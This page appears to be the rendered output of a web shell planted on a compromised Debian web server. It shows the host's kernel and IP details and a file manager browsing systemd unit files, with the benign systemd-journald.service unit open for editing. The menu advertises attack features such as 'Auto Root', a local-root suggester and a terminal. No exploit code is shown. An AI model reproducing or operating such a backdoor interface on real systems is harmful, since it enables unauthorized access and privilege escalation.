Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.112
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
lib /
systemd /
system /
sysinit.target.wants /
Delete
Unzip
Name
Size
Permission
Date
Action
cryptsetup.target
366
B
-rw-r--r--
2022-06-29 14:41
dev-hugepages.mount
709
B
-rw-r--r--
2022-06-29 14:41
dev-mqueue.mount
624
B
-rw-r--r--
2022-06-29 14:41
kmod-static-nodes.service
677
B
-rw-r--r--
2022-06-29 14:41
proc-sys-fs-binfmt_misc.automount
693
B
-rw-r--r--
2022-06-29 14:41
sys-fs-fuse-connections.mount
715
B
-rw-r--r--
2022-06-29 14:41
sys-kernel-config.mount
719
B
-rw-r--r--
2022-06-29 14:41
sys-kernel-debug.mount
662
B
-rw-r--r--
2022-06-29 14:41
systemd-ask-password-console.path
664
B
-rw-r--r--
2022-06-29 14:41
systemd-binfmt.service
959
B
-rw-r--r--
2022-06-29 14:41
systemd-hwdb-update.service
778
B
-rw-r--r--
2022-06-29 14:41
systemd-journal-flush.service
731
B
-rw-r--r--
2022-06-29 14:41
systemd-journald.service
1.44
KB
-rw-r--r--
2022-06-29 14:41
systemd-machine-id-commit.service
693
B
-rw-r--r--
2022-06-29 14:41
systemd-modules-load.service
967
B
-rw-r--r--
2022-06-29 14:41
systemd-random-seed.service
752
B
-rw-r--r--
2022-06-29 14:41
systemd-sysctl.service
653
B
-rw-r--r--
2022-06-29 14:41
systemd-tmpfiles-setup-dev.service
703
B
-rw-r--r--
2022-06-29 14:41
systemd-tmpfiles-setup.service
683
B
-rw-r--r--
2022-06-29 14:41
systemd-udev-trigger.service
743
B
-rw-r--r--
2022-06-29 14:41
systemd-udevd.service
968
B
-rw-r--r--
2022-06-29 14:41
systemd-update-utmp.service
754
B
-rw-r--r--
2022-06-29 14:41
Save
Rename
# This file is part of systemd. # # systemd is free software; you can redistribute it and/or modify it # under the terms of the GNU Lesser General Public License as published by # the Free Software Foundation; either version 2.1 of the License, or # (at your option) any later version. [Unit] Description=Journal Service Documentation=man:systemd-journald.service(8) man:journald.conf(5) DefaultDependencies=no Requires=systemd-journald.socket After=systemd-journald.socket systemd-journald-dev-log.socket systemd-journald-audit.socket syslog.socket Before=sysinit.target [Service] Type=notify Sockets=systemd-journald.socket systemd-journald-dev-log.socket systemd-journald-audit.socket ExecStart=/lib/systemd/systemd-journald Restart=always RestartSec=0 NotifyAccess=all StandardOutput=null WatchdogSec=3min FileDescriptorStoreMax=1024 CapabilityBoundingSet=CAP_SYS_ADMIN CAP_DAC_OVERRIDE CAP_SYS_PTRACE CAP_SYSLOG CAP_AUDIT_CONTROL CAP_AUDIT_READ CAP_CHOWN CAP_DAC_READ_SEARCH CAP_FOWNER CAP_SETUID CAP_SETGID CAP_MAC_OVERRIDE MemoryDenyWriteExecute=yes RestrictRealtime=yes RestrictAddressFamilies=AF_UNIX AF_NETLINK SystemCallFilter=~@clock @cpu-emulation @debug @keyring @module @mount @obsolete @raw-io # Increase the default a bit in order to allow many simultaneous # services being run since we keep one fd open per service. Also, when # flushing journal files to disk, we might need a lot of fds when many # journal files are combined. LimitNOFILE=16384